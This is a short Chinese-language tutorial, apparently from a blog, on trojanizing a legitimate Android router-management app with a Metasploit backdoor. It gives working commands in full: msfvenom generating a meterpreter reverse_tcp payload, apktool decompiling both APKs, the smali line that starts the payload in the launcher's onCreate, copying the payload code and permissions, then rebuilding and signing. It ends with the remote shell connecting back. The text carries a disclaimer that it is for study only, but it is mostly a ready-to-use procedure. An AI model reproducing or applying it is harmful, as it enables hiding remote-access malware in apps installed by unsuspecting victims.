手动给APP添加backdoor(msf)

本示例仅为学习研究所用，使用请准守《网络安全法》。造成一切后果，自行承担。本站不但任何责任！！！

前期的准备

• 某路由器管理APP(luyou.apk)
• kali Linux

• 手机（android 10）

  01 生成Android shell

  在生成之前，确定本机的ip地址。

  msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.93 LPORT=5555 R > 66.apk

  这样我们便生成了一个名为66.apk的android shell
  

  02 反编译刚才生成的shell和正常app

  apktool d 66.apk
  apktool d luyou.apk

  
  反编译后的效果
  

  03 注入PAYLOAD

  -1 进入luyou文件夹，打开AndroidManifest.xml文件
  -2 搜索关键字Launch和Main找到所对应启动的smail文件，说白了就是找app启动文件路径
  
  当前的启动路径为：com/mercury/mercuryrouterLaunchActivity
  打开文件LaunchActivity.smali搜索onCreat函数，找到bundle对象，换行添加启动PAYLOAD代码：

  invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

  

  04 将木马文件中的smali文件复制到载体smali文件夹中

  cp -r 66/smali/com/* luyou/smali/com/

  05添加权限

  打开木马AndroidManifest.xml文件
  复制以<uses-permission android:name=.......>
  开头的所有代码按照格式复制到载体luyou的AndroidManifest.xml文件中，删除重复权限就ok
  

  06回遍

  apktool b luyou

  

  07签名

  这样我们的app添加就算完成了，但是在手机是无法运行的。因为没有签名。
  生成KEYSTORE:

  keytool -genkey -v -keystore mykey.keystore -alias alias_name -keyalg RSA -keysize 1024 -validity 22222

  签名：

  jarsigner -keystore mykey.keystore luyou.apk alias_name -s

  08 测试

  安装app
  
  msf终端成功上线